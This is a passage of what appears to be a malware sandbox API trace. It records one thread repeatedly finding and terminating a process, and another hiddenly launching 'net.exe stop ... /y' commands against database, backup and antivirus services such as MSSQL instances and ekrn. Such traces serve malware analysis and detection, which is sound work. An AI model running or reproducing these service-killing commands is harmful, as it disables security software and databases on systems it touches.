NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f23c | out: SystemInformation=0x32358f0, ResultLength=0x581f23c*=0xe250) returned 0x0 [0080.543] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x4bc) returned 0x328 [0080.566] TerminateProcess (hProcess=0x328, uExitCode=0xffffffff) returned 1 [0080.577] CloseHandle (hObject=0x328) returned 1 [0080.578] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0086.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0xe2e0) returned 0x0 [0086.488] GetCurrentProcessId () returned 0x71c [0086.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f23c | out: SystemInformation=0x32358f0, ResultLength=0x581f23c*=0xe2e0) returned 0x0 [0086.488] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x4bc) returned 0x30c [0086.489] TerminateProcess (hProcess=0x30c, uExitCode=0xffffffff) returned 1 [0086.489] CloseHandle (hObject=0x30c) returned 1 [0086.489] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0091.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x11708) returned 0x0 [0091.979] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0096.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x13528) returned 0x0 [0096.985] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0101.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x15310) returned 0x0 [0101.359] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0104.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x177c0) returned 0x0 [0104.514] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0107.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x21c20) returned 0xc0000004 [0107.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x329a318, Length=0x24420, ResultLength=0x581f248 | out: SystemInformation=0x329a318, ResultLength=0x581f248*=0x19ea8) returned 0x0 [0107.754] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0112.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x581f248 | out: SystemInformation=0x3276150, ResultLength=0x581f248*=0x19fb8) returned 0x0 [0112.201] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0114.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x581f248 | out: SystemInformation=0x3276150, ResultLength=0x581f248*=0x1b4b0) returned 0x0 [0127.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x26c98) returned 0xc0000004 [0127.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x29498, ResultLength=0x581f248 | out: SystemInformation=0x3280420, ResultLength=0x581f248*=0x1db60) returned 0x0 [0138.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x24858) returned 0xc0000004 [0138.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x1c008) returned 0x0 [0138.244] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0141.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x21258) returned 0xc0000004 [0141.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x23a58, ResultLength=0x581f248 | out: SystemInformation=0x327d1a8, ResultLength=0x581f248*=0x19748) returned 0x0 [0141.179] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0144.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x19ef0) returned 0x0 [0144.909] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0147.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x197e8) returned 0x0 [0147.679] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0150.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x1b9a8) returned 0x0 [0150.523] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0153.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x1bf18) returned 0x0 [0153.131] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0156.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x1c748) returned 0x0 [0157.486] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0160.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x581f248 | out: SystemInformation=0x327d1a8, ResultLength=0x581f248*=0x19aa0) returned 0x0 [0160.648] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0163.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x581f248 | out: SystemInformation=0x327d1a8, ResultLength=0x581f248*=0x18330) returned 0x0 [0163.242] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0166.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x581f248 | out: SystemInformation=0x327d1a8, ResultLength=0x581f248*=0x17330) returned 0x0 [0167.604] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0170.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x17438) returned 0x0 [0170.121] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0172.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x17310) returned 0x0 [0172.640] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0175.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x15d08) returned 0x0 [0175.140] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0177.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x14388) returned 0x0 [0177.739] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0180.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x141a8) returned 0x0 [0180.317] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0183.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x13f48) returned 0x0 [0186.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x32358f0, ResultLength=0x581f248*=0x14048) returned 0x0 [0186.641] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0189.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0x14048) returned 0x0 [0202.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3276150, ResultLength=0x581f248*=0xeee8) returned 0x0 [0202.319] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0204.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xebd0) returned 0x0 [0204.889] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0207.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xebd0) returned 0x0 [0207.403] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0209.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xeb10) returned 0x0 [0209.913] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0212.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xead0) returned 0x0 [0212.424] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0214.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe510) returned 0x0 [0214.935] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0217.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe490) returned 0x0 [0217.447] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0220.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe7e0) returned 0x0 [0220.289] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0222.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe8b0) returned 0x0 [0222.829] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0225.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe930) returned 0x0 [0225.340] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0227.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe870) returned 0x0 [0227.867] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0230.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe6f0) returned 0x0 [0230.379] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0232.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe4e0) returned 0x0 [0232.922] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0235.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3276150, ResultLength=0x581f248*=0xe4e0) returned 0x0 [0235.433] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0237.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe448) returned 0x0 [0237.967] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0240.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe448) returned 0x0 [0240.484] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0242.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xe308) returned 0x0 [0242.984] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0245.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xdf48) returned 0x0 [0245.605] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0248.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xdf88) returned 0x0 [0248.141] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0250.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x581f248 | out: SystemInformation=0x3256130, ResultLength=0x581f248*=0xde08) returned 0x0 Thread: id = 88 os_tid = 0x344 [0083.444] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0083.444] CoGetContextToken (in: pToken=0x5a6f5e4 | out: pToken=0x5a6f5e4) returned 0x0 [0083.444] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a6f608 | out: ppvObject=0x5a6f608*=0x6ded34) returned 0x0 [0083.445] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x5a6f634 | out: pThreadType=0x5a6f634*=0) returned 0x0 [0083.445] IUnknown:Release (This=0x6ded34) returned 0x0 [0083.445] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0083.445] CoUninitialize () [0084.857] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0084.857] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x37c, hWritePipe=0x5a6ef64*=0x2e4) returned 1 [0084.857] GetCurrentProcess () returned 0xffffffff [0084.857] GetCurrentProcess () returned 0xffffffff [0084.857] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x37c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x2f8) returned 1 [0084.857] CloseHandle (hObject=0x37c) returned 1 [0084.857] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0084.857] CoTaskMemAlloc (cb=0x20e) returned 0x72e4e8 [0084.857] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x72e4e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0084.857] CoTaskMemFree (pv=0x72e4e8) [0084.858] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop bedbg /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2e4, hStdError=0x0), lpProcessInformation=0x25024a4 | out: lpCommandLine="\"net.exe\" stop bedbg /y", lpProcessInformation=0x25024a4*(hProcess=0x37c, hThread=0x3d0, dwProcessId=0x738, dwThreadId=0x2a8)) returned 1 [0086.490] CloseHandle (hObject=0x2e4) returned 1 [0086.494] GetFileType (hFile=0x2f8) returned 0x3 [0086.494] CloseHandle (hObject=0x3d0) returned 1 [0086.842] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.842] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x30c, hWritePipe=0x5a6ef64*=0x2fc) returned 1 [0086.843] GetCurrentProcess () returned 0xffffffff [0086.843] GetCurrentProcess () returned 0xffffffff [0086.843] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x30c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x2f4) returned 1 [0086.843] CloseHandle (hObject=0x30c) returned 1 [0086.843] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.843] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.843] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.843] CoTaskMemFree (pv=0x733c48) [0086.843] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x2497dc0 | out: lpCommandLine="\"net.exe\" stop MSSQL$SQL_2008 /y", lpProcessInformation=0x2497dc0*(hProcess=0x34c, hThread=0x344, dwProcessId=0x814, dwThreadId=0xb7c)) returned 1 [0087.202] CloseHandle (hObject=0x2fc) returned 1 [0087.202] GetFileType (hFile=0x2f4) returned 0x3 [0087.203] CloseHandle (hObject=0x344) returned 1 [0087.584] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.585] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x2fc, hWritePipe=0x5a6ef64*=0x40c) returned 1 [0087.585] GetCurrentProcess () returned 0xffffffff [0087.585] GetCurrentProcess () returned 0xffffffff [0087.585] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x408) returned 1 [0087.585] CloseHandle (hObject=0x2fc) returned 1 [0087.585] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.585] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0087.585] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.585] CoTaskMemFree (pv=0x733bb0) [0087.585] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop EhttpSrv /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x40c, hStdError=0x0), lpProcessInformation=0x24b4324 | out: lpCommandLine="\"net.exe\" stop EhttpSrv /y", lpProcessInformation=0x24b4324*(hProcess=0x410, hThread=0x2fc, dwProcessId=0xc58, dwThreadId=0xc5c)) returned 1 [0088.000] CloseHandle (hObject=0x40c) returned 1 [0088.000] GetFileType (hFile=0x408) returned 0x3 [0088.000] CloseHandle (hObject=0x2fc) returned 1 [0088.234] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0088.234] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x2fc, hWritePipe=0x5a6ef64*=0x40c) returned 1 [0088.234] GetCurrentProcess () returned 0xffffffff [0088.234] GetCurrentProcess () returned 0xffffffff [0088.234] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x424) returned 1 [0088.234] CloseHandle (hObject=0x2fc) returned 1 [0088.234] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.234] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0088.234] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0088.234] CoTaskMemFree (pv=0x733bb0) [0088.234] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MMS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x40c, hStdError=0x0), lpProcessInformation=0x24d0b68 | out: lpCommandLine="\"net.exe\" stop MMS /y", lpProcessInformation=0x24d0b68*(hProcess=0x420, hThread=0x2fc, dwProcessId=0xc9c, dwThreadId=0xca0)) returned 1 [0088.251] CloseHandle (hObject=0x40c) returned 1 [0088.251] GetFileType (hFile=0x424) returned 0x3 [0088.251] CloseHandle (hObject=0x2fc) returned 1 [0090.302] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0090.302] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x2fc, hWritePipe=0x5a6ef64*=0x40c) returned 1 [0090.302] GetCurrentProcess () returned 0xffffffff [0090.302] GetCurrentProcess () returned 0xffffffff [0090.302] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x440) returned 1 [0090.302] CloseHandle (hObject=0x2fc) returned 1 [0090.302] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0090.302] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0090.302] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0090.302] CoTaskMemFree (pv=0x741d20) [0090.302] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$SQLEXPRESS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x40c, hStdError=0x0), lpProcessInformation=0x24db5d8 | out: lpCommandLine="\"net.exe\" stop MSSQL$SQLEXPRESS /y", lpProcessInformation=0x24db5d8*(hProcess=0x43c, hThread=0x2fc, dwProcessId=0xce4, dwThreadId=0xce8)) returned 1 [0091.901] CloseHandle (hObject=0x40c) returned 1 [0091.906] GetFileType (hFile=0x440) returned 0x3 [0091.906] CloseHandle (hObject=0x2fc) returned 1 [0092.478] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0092.478] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x40c, hWritePipe=0x5a6ef64*=0x448) returned 1 [0092.478] GetCurrentProcess () returned 0xffffffff [0092.478] GetCurrentProcess () returned 0xffffffff [0092.478] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x440) returned 1 [0092.478] CloseHandle (hObject=0x40c) returned 1 [0092.478] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0092.478] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0092.479] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0092.479] CoTaskMemFree (pv=0x741d20) [0092.479] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ekrn /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS 